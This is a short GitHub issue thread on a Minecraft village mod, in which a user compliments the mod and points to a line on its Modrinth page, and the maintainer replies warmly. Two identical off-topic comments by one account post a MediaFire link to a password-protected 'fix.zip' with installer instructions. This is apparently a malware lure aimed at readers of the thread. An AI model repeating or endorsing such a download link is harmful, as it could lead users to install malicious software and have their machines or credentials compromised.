### ISSUE TITLE
Modrinth page

### ISSUE THREAD

**Issue by Amberslice** [liopyu/LiosOverhauledVillage#3]
Hey bud, loving this mod and my server looks amazing with this installed, wish i could find create dynamic villages for fabric tho.

I found this

_"Usage in Modpacks
Feel free to use Lio's Overhalued Villages "_ on the bottom of your modrinth page and wanted to show you :)

Please keep up the amazing work! 

#that silly squirrel team

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by liopyu** [comment]
Glad you found it useful! Your modpack looks great!
